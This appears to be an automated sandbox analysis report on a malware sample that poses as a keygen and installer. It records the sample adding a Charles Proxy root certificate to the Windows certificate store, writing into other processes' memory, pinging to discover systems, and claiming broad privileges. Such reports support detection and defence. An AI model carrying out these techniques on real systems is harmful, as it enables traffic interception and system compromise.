f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 19000000010000001000000018e847daffeaedafa0faaea36340ea790f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	6521242.71
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104612000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Install.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Install.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Install.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

1276 PING.EXE
804 PING.EXE
2068 PING.EXE

pid	process
1276	PING.EXE
804	PING.EXE
2068	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exe3260.tmp.exejfiag3g_gg.exe4960374.546521242.714086859.44

pid	process
1472	file.exe
1472	file.exe
1472	file.exe
1472	file.exe
968	3260.tmp.exe
2292	jfiag3g_gg.exe
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2556	6521242.71
2432	4086859.44
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2556	6521242.71
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54
2460	4960374.54

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

msiexec.exe

pid process

1048 msiexec.exe

pid	process
1048	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

file.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeDebugPrivilege	1472	file.exe
Token: SeCreateTokenPrivilege	1472	file.exe
Token: SeShutdownPrivilege	1048	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1048	msiexec.exe
Token: SeRestorePrivilege	1456	msiexec.exe
Token: SeTakeOwnershipPrivilege	1456	msiexec.exe
Token: SeSecurityPrivilege	1456	msiexec.exe
Token: SeCreateTokenPrivilege	1048	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1048	msiexec.exe
Token: SeLockMemoryPrivilege	1048	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1048	msiexec.exe
Token: SeMachineAccountPrivilege	1048	msiexec.exe
Token: SeTcbPrivilege	1048	msiexec.exe
Token: SeSecurityPrivilege	1048	msiexec.exe
Token: SeTakeOwnershipPrivilege	1048	msiexec.exe
Token: SeLoadDriverPrivilege	1048	msiexec.exe
Token: SeSystemProfilePrivilege	1048	msiexec.exe
Token: SeSystemtimePrivilege	1048	msiexec.exe
Token: SeProfSingleProcessPrivilege	1048	msiexec.exe
Token: SeIncBasePriorityPrivilege	1048	msiexec.exe
Token: SeCreatePagefilePrivilege	1048	msiexec.exe
Token: SeCreatePermanentPrivilege	1048	msiexec.exe
Token: SeBackupPrivilege	1048	msiexec.exe
Token: SeRestorePrivilege	1048	msiexec.exe
Token: SeShutdownPrivilege	1048	msiexec.exe
Token: SeDebugPrivilege	1048	msiexec.exe
Token: SeAuditPrivilege	1048	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1048	msiexec.exe
Token: SeChangeNotifyPrivilege	1048	msiexec.exe
Token: SeRemoteShutdownPrivilege	1048	msiexec.exe
Token: SeUndockPrivilege	1048	msiexec.exe
Token: SeSyncAgentPrivilege	1048	msiexec.exe
Token: SeEnableDelegationPrivilege	1048	msiexec.exe
Token: SeManageVolumePrivilege	1048	msiexec.exe
Token: SeImpersonatePrivilege	1048	msiexec.exe
Token: SeCreateGlobalPrivilege	1048	msiexec.exe
Token: SeCreateTokenPrivilege	1048	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1048	msiexec.exe
Token: SeLockMemoryPrivilege	1048	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1048	msiexec.exe
Token: SeMachineAccountPrivilege	1048	msiexec.exe
Token: SeTcbPrivilege	1048	msiexec.exe
Token: SeSecurityPrivilege	1048	msiexec.exe
Token: SeTakeOwnershipPrivilege	1048	msiexec.exe
Token: SeLoadDriverPrivilege	1048	msiexec.exe
Token: SeSystemProfilePrivilege	1048	msiexec.exe
Token: SeSystemtimePrivilege	1048	msiexec.exe
Token: SeProfSingleProcessPrivilege	1048	msiexec.exe
Token: SeIncBasePriorityPrivilege	1048	msiexec.exe
Token: SeCreatePagefilePrivilege	1048	msiexec.exe
Token: SeCreatePermanentPrivilege	1048	msiexec.exe
Token: SeBackupPrivilege	1048	msiexec.exe
Token: SeRestorePrivilege	1048	msiexec.exe
Token: SeShutdownPrivilege	1048	msiexec.exe
Token: SeDebugPrivilege	1048	msiexec.exe
Token: SeAuditPrivilege	1048	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1048	msiexec.exe
Token: SeChangeNotifyPrivilege	1048	msiexec.exe
Token: SeRemoteShutdownPrivilege	1048	msiexec.exe
Token: SeUndockPrivilege	1048	msiexec.exe
Token: SeSyncAgentPrivilege	1048	msiexec.exe
Token: SeEnableDelegationPrivilege	1048	msiexec.exe
Token: SeManageVolumePrivilege	1048	msiexec.exe
Token: SeImpersonatePrivilege	1048	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

msiexec.exe

pid process

1048 msiexec.exe

pid	process
1048	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

keygen-step-4.exefile.exe3260.tmp.execmd.exeSetup.exemsiexec.exe

description	pid	process	target process
PID 1888 wrote to memory of 1472	1888	keygen-step-4.exe	file.exe
PID 1888 wrote to memory of 1472	1888	keygen-step-4.exe	file.exe
PID 1888 wrote to memory of 1472	1888	keygen-step-4.exe	file.exe
PID 1888 wrote to memory of 1472	1888	keygen-step-4.exe	file.exe
PID 1472 wrote to memory of 548	1472	file.exe	3260.tmp.exe
PID 1472 wrote to memory of 548	1472	file.exe	3260.tmp.exe
PID 1472 wrote to memory of 548	1472	file.exe	3260.tmp.exe
PID 1472 wrote to memory of 548	1472	file.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
PID 548 wrote to memory of 968	548	3260.tmp.exe	3260.tmp.exe
